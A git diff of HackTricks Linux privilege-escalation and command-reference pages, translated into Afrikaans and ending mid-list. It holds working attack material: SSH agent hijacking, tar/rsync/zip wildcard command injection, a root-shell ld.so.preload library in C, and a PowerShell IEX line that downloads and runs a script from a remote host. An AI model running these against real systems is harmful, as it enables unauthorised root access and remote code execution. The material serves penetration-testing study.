-# Summary - -What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: +# Opsomming +Wat kan jy doen as jy binne die `/etc/ssh_config` of binne `$HOME/.ssh/config`-konfigurasie hierdie ontdek: ``` ForwardAgent yes ``` +As jy root binne die masjien is, kan jy waarskynlik **toegang verkry tot enige ssh-verbinding wat deur enige agent gemaak is** wat jy in die _/tmp_ gids kan vind. -If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory - -Impersonate Bob using one of Bob's ssh-agent: - +Impersonateer Bob deur een van Bob se ssh-agente te gebruik: ```bash SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston ``` +## Hoekom werk dit? -## Why does this work? +Wanneer jy die veranderlike `SSH_AUTH_SOCK` stel, het jy toegang tot die sleutels van Bob wat gebruik is in Bob se ssh-verbinding. As sy privaat sleutel nog daar is (normaalweg sal dit wees), sal jy in staat wees om enige gasheer daarmee te benader. -When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it. +Aangesien die privaat sleutel in die geheue van die agent onversleutel is, vermoed ek dat as jy Bob is maar nie die wagwoord van die privaat sleutel weet nie, kan jy steeds toegang tot die agent verkry en dit gebruik. -As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it. +'n Ander opsie is dat die gebruiker wat eienaar is van die agent en root moontlik toegang tot die geheue van die agent kan verkry en die privaat sleutel kan onttrek. -Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. +# Lang verduideliking en uitbuiting -# Long explanation and exploitation - -**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)** +**Kyk na die [oorspronklike navorsing hier](https://www.clockwork.com/insights/ssh-agent-hijacking/)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index ab67eeb19..d3a698ce8 100644 --- a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,104 +1,85 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## chown, chmod -You can **indicate which file owner and permissions you want to copy for the rest of the files** - +Jy kan **aandui watter lêiereienaar en toestemmings jy wil kopieer vir die res van die lêers** ```bash touch "--reference=/my/own/path/filename" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(gekombineerde aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Tar -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Rsync -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash Interesting rsync option from manual: - -e, --rsh=COMMAND specify the remote shell to use - --rsync-path=PROGRAM specify the rsync to run on remote machine +-e, --rsh=COMMAND specify the remote shell to use +--rsync-path=PROGRAM specify the rsync to run on remote machine ``` ```bash touch "-e sh shell.sh" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(_rsync _attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Jy kan dit uitbuit deur gebruik te maak van [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(rsync-aanval)_\ +Meer inligting in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## 7z -In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root: - +In **7z** kan jy selfs deur `--` voor `*` te gebruik (let daarop dat `--` beteken dat die volgende inset nie as parameters behandel kan word nie, so net lêernaamspaaie in hierdie geval) 'n willekeurige fout veroorsaak om 'n lêer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word: ```bash 7za a /backup/$filename.zip -t7z -snl -p$pass -- * ``` - -And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read: - +En jy kan lêers in die gids waar dit uitgevoer word, skep. Jy kan die lêer `@root.txt` en die lêer `root.txt` skep as 'n **symlink** na die lêer wat jy wil lees: ```bash cd /path/to/7z/acting/folder touch @root.txt ln -s /file/you/want/to/read root.txt ``` +Dan, wanneer **7z** uitgevoer word, sal dit `root.txt` behandel as 'n lêer wat die lys van lêers bevat wat dit moet komprimeer (dit is wat die bestaan van `@root.txt` aandui) en wanneer 7z `root.txt` lees, sal dit `/file/you/want/to/read` lees en **aangesien die inhoud van hierdie lêer nie 'n lys van lêers is nie, sal dit 'n fout veroorsaak** wat die inhoud wys. -Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. - -_More info in Write-ups of the box CTF from HackTheBox._ +_Meer inligting in Write-ups van die boks CTF van HackTheBox._ ## Zip -**Execute arbitrary commands:** - +**Voer willekeurige opdragte uit:** ```bash zip name.zip files -T --unzip-command "sh -c whoami" ``` - - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md index 6088d573f..be4f800e3 100644 --- a/linux-hardening/privilege-escalation/write-to-root.md +++ b/linux-hardening/privilege-escalation/write-to-root.md @@ -1,46 +1,44 @@ -# Arbitrary File Write to Root +# Willekeurige Lêer Skryf na Root
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
### /etc/ld.so.preload -This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\ -If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary. - -For example: `echo "/tmp/pe.so" > /etc/ld.so.preload` +Hierdie lêer gedra soos die **`LD_PRELOAD`** omgewingsveranderlike, maar dit werk ook in **SUID-binêre lêers**.\ +As jy dit kan skep of wysig, kan jy net 'n **pad na 'n biblioteek wat gelaai sal word** by elke uitgevoerde binêre lêer toevoeg. +Byvoorbeeld: `echo "/tmp/pe.so" > /etc/ld.so.preload` ```c #include #include #include void _init() { - unlink("/etc/ld.so.preload"); - setgid(0); - setuid(0); - system("/bin/bash"); +unlink("/etc/ld.so.preload"); +setgid(0); +setuid(0); +system("/bin/bash"); } //cd /tmp //gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` +### Git-aanslae -### Git hooks +[**Git-aanslae**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) is **skripte** wat **uitgevoer** word by verskeie **gebeure** in 'n git-opberging, soos wanneer 'n toewysing geskep word, 'n saamvoeging plaasvind... As 'n **bevoorregte skrip of gebruiker** hierdie aksies gereeld uitvoer en dit moontlik is om in die `.git`-opvouer te **skryf**, kan dit gebruik word vir **privilege-escalation**. -[**Git hooks**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are **scripts** that are **run** on various **events** in a git repository like when a commit is created, a merge... So if a **privileged script or user** is performing this actions frequently and it's possible to **write in the `.git` folder**, this can be used to **privesc**. - -For example, It's possible to **generate a script** in a git repo in **`.git/hooks`** so it's always executed when a new commit is created: +Byvoorbeeld, dit is moontlik om 'n skrip te **genereer** in 'n git-opberging in die **`.git/hooks`**-opvouer sodat dit altyd uitgevoer word wanneer 'n nuwe toewysing geskep word: {% code overflow="wrap" %} ```bash @@ -51,14 +49,14 @@ chmod +x pre-commit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md index af9cb8722..348751841 100644 --- a/linux-hardening/useful-linux-commands/README.md +++ b/linux-hardening/useful-linux-commands/README.md @@ -1,29 +1,27 @@ -# Useful Linux Commands +# Nuttige Linux-opdragte
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## Common Bash - +## Algemene Bash ```bash #Exfiltration using Base64 base64 -w 0 file @@ -75,7 +73,7 @@ unzip file.zip sudo apt-get install xz-utils; unxz file.xz #Add new user -useradd -p 'openssl passwd -1 ' hacker +useradd -p 'openssl passwd -1 ' hacker #Clipboard xclip -sel c < cat file.txt @@ -142,21 +140,18 @@ sudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip 7z l file.zip ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Bash for Windows - +## Bash vir Windows ```bash #Base64 for Windows echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 - + #Exe compression upx -9 nc.exe @@ -165,16 +160,141 @@ wine exe2bat.exe nc.exe nc.txt #Compile Windows python exploit to exe pip install pyinstaller -wget -O exploit.py http://www.exploit-db.com/download/31853 +wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py #Compile for windows #sudo apt-get install gcc-mingw-w64-i686 i686-mingw32msvc-gcc -o executable useradd.c ``` - ## Greps +Grep is a powerful command-line tool used for searching and filtering text. It allows you to search for specific patterns or strings within files or output. Here are some useful grep commands: + +### Basic Grep + +The basic syntax for using grep is as follows: + +```bash +grep [options] pattern [file...] +``` + +- `pattern` is the string or regular expression you want to search for. +- `file` is the file or files you want to search within. If no file is specified, grep will search from standard input. + +### Searching for a Pattern in a File + +To search for a pattern in a specific file, use the following command: + +```bash +grep pattern file +``` + +For example, to search for the word "password" in the file `example.txt`, you would use: + +```bash +grep password example.txt +``` + +### Searching for a Pattern in Multiple Files + +To search for a pattern in multiple files, use the following command: + +```bash +grep pattern file1 file2 file3 +``` + +For example, to search for the word "password" in the files `file1.txt`, `file2.txt`, and `file3.txt`, you would use: + +```bash +grep password file1.txt file2.txt file3.txt +``` + +### Searching for a Pattern in a Directory + +To search for a pattern in all files within a directory, use the following command: + +```bash +grep pattern directory/* +``` + +For example, to search for the word "password" in all files within the `documents` directory, you would use: + +```bash +grep password documents/* +``` + +### Ignoring Case Sensitivity + +By default, grep is case-sensitive. To ignore case sensitivity and search for a pattern regardless of case, use the `-i` option: + +```bash +grep -i pattern file +``` + +For example, to search for the word "password" in the file `example.txt` without considering case sensitivity, you would use: + +```bash +grep -i password example.txt +``` + +### Displaying Line Numbers + +To display line numbers along with the matching lines, use the `-n` option: + +```bash +grep -n pattern file +``` + +For example, to search for the word "password" in the file `example.txt` and display the line numbers, you would use: + +```bash +grep -n password example.txt +``` + +### Searching Recursively + +To search for a pattern recursively in all files within a directory and its subdirectories, use the `-r` option: + +```bash +grep -r pattern directory +``` + +For example, to search for the word "password" recursively in all files within the `documents` directory, you would use: + +```bash +grep -r password documents +``` + +### Inverting the Match + +To invert the match and display lines that do not contain the pattern, use the `-v` option: + +```bash +grep -v pattern file +``` + +For example, to search for lines in the file `example.txt` that do not contain the word "password", you would use: + +```bash +grep -v password example.txt +``` + +### Using Regular Expressions + +Grep supports the use of regular expressions for more advanced pattern matching. To use regular expressions, use the `-E` option: + +```bash +grep -E "regex" file +``` + +For example, to search for lines in the file `example.txt` that start with "password" followed by any three characters, you would use: + +```bash +grep -E "^password..." example.txt +``` + +These are just a few examples of how grep can be used. It is a versatile tool that can be combined with other commands to perform complex text searches and manipulations. ```bash #Extract emails from file grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt @@ -254,9 +374,83 @@ grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt #Extract ISBN Numbers egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt ``` +## Vind -## Find +The `find` command is used to search for files and directories in a specified location. It can be used with various options to filter the search results based on different criteria. +### Syntax: + +``` +find [path] [expression] +``` + +### Voorbeelde: + +1. Vind alle bestande in die huidige gids: + + ``` + find . + ``` + +2. Vind alle bestande met 'txt' in die naam: + + ``` + find . -name "*txt*" + ``` + +3. Vind alle leë gids in die huidige gids: + + ``` + find . -type d -empty + ``` + +4. Vind alle bestande wat groter is as 1 MB: + + ``` + find . -size +1M + ``` + +5. Vind alle bestande wat in die afgelope 7 dae gewysig is: + + ``` + find . -mtime -7 + ``` + +6. Vind alle bestande wat eienaarskap is deur 'gebruiker': + + ``` + find . -user gebruiker + ``` + +7. Vind alle bestande wat uitvoerbaar is: + + ``` + find . -type f -executable + ``` + +8. Vind alle bestande wat deur 'groep' besit word: + + ``` + find . -group groep + ``` + +9. Vind alle bestande wat nie deur 'gebruiker' besit word nie: + + ``` + find . ! -user gebruiker + ``` + +10. Vind alle bestande wat die afgelope 30 minute gewysig is: + + ``` + find . -mmin -30 + ``` + +### Opmerkings: + +- Die `path`-argument spesifiseer die beginpunt van die soektog. As dit nie opgegee word nie, sal die huidige gids gebruik word. +- Die `expression`-argument bevat die verskillende opsies en voorwaardes wat gebruik word om die soektog te verfyn. +- Die `find`-opdrag kan baie kragtig wees, so wees versigtig wanneer jy dit gebruik. ```bash # Find SUID set files. find / -perm /u=s -ls 2>/dev/null @@ -285,25 +479,153 @@ find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /p # Found Newer directory only and sort by time. (depth = 5) find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less ``` +## Nmap soekhulp -## Nmap search help +Nmap is 'n kragtige en veelsydige netwerk skandering hulpmiddel wat gebruik kan word om netwerktoestelle te ontdek en hul veiligheid te ondersoek. Hier is 'n paar nuttige opdragte en voorbeelde om jou te help om Nmap effektief te gebruik: +### Basiese skandering + +Om 'n basiese skandering uit te voer, gebruik die volgende opdrag: + +``` +nmap +``` + +Vervang `` met die IP-adres of die domeinnaam van die teikenstelsel. + +### Spesifieke poorte skandering + +As jy spesifieke poorte wil skandeer, gebruik die `-p` vlag gevolg deur die poortnommers. Byvoorbeeld: + +``` +nmap -p 80,443 +``` + +Hierdie opdrag sal slegs poorte 80 en 443 op die teikenstelsel skandeer. + +### Volledige skandering + +Om 'n volledige skandering uit te voer, gebruik die `-p-` vlag. Byvoorbeeld: + +``` +nmap -p- +``` + +Hierdie opdrag sal alle poorte op die teikenstelsel skandeer. + +### Skandering van spesifieke protokolle + +As jy slegs spesifieke protokolle wil skandeer, gebruik die `--top-ports` vlag gevolg deur die aantal poorte wat jy wil skandeer. Byvoorbeeld: + +``` +nmap --top-ports 10 +``` + +Hierdie opdrag sal die top 10 poorte op die teikenstelsel skandeer. + +### Aggressiewe skandering + +Om 'n aggressiewe skandering uit te voer, gebruik die `-A` vlag. Byvoorbeeld: + +``` +nmap -A +``` + +Hierdie opdrag sal verskillende inligting oor die teikenstelsel versamel, soos bedryfstelsel, dienste, en versie-inligting. + +### Stil skandering + +As jy 'n stil skandering wil uitvoer, gebruik die `-sS` vlag. Byvoorbeeld: + +``` +nmap -sS +``` + +Hierdie opdrag sal probeer om die skandering so stil as moontlik uit te voer. + +### Skandering van subnetwerk + +Om 'n subnetwerk te skandeer, gebruik die `/` gevolg deur die subnetmasker. Byvoorbeeld: + +``` +nmap / +``` + +Vervang `` met die subnetwerkadres en `` met die subnetmasker. + +### Uitvoer na 'n lêer + +Om die uitvoer na 'n lêer te stuur, gebruik die `>` gevolg deur die lêernaam. Byvoorbeeld: + +``` +nmap > uitvoer.txt +``` + +Hierdie opdrag sal die uitvoer van die skandering stuur na 'n lêer genaamd "uitvoer.txt". + +Dit is slegs 'n paar voorbeelde van hoe jy Nmap kan gebruik. Daar is baie meer funksies en opsies beskikbaar. Vir meer inligting, gebruik die `nmap --help` opdrag of besoek die [Nmap-dokumentasie](https://nmap.org/docs.html). ```bash #Nmap scripts ((default or version) and smb)) nmap --script-help "(default or version) and *smb*" locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb nmap --script-help "(default or version) and smb)" ``` - ## Bash +Bash is die standaard skulpry in die meeste Linux-stelsels en is 'n kragtige en veelsydige skulpry wat gebruik kan word vir verskeie take. Hier is 'n paar nuttige opdragte en tegnieke wat jy kan gebruik om jou Linux-stelsel te hardloop en te beveilig: + +### Opdragte + +- `ls`: Lys die inhoud van 'n gids. +- `cd`: Verander die huidige gids. +- `pwd`: Druk die pad van die huidige gids af. +- `mkdir`: Skep 'n nuwe gids. +- `rm`: Verwyder 'n lêer of gids. +- `cp`: Kopieer 'n lêer of gids. +- `mv`: Verskuif of hernoem 'n lêer of gids. +- `cat`: Druk die inhoud van 'n lêer af. +- `grep`: Soek na 'n patroon in 'n lêer. +- `chmod`: Verander die toestemmings van 'n lêer of gids. +- `chown`: Verander die eienaar van 'n lêer of gids. +- `ps`: Lys aktiewe prosesse. +- `kill`: Beëindig 'n proses. +- `top`: Wys 'n lys van aktiewe prosesse en hul gebruik van hulpbronne. +- `df`: 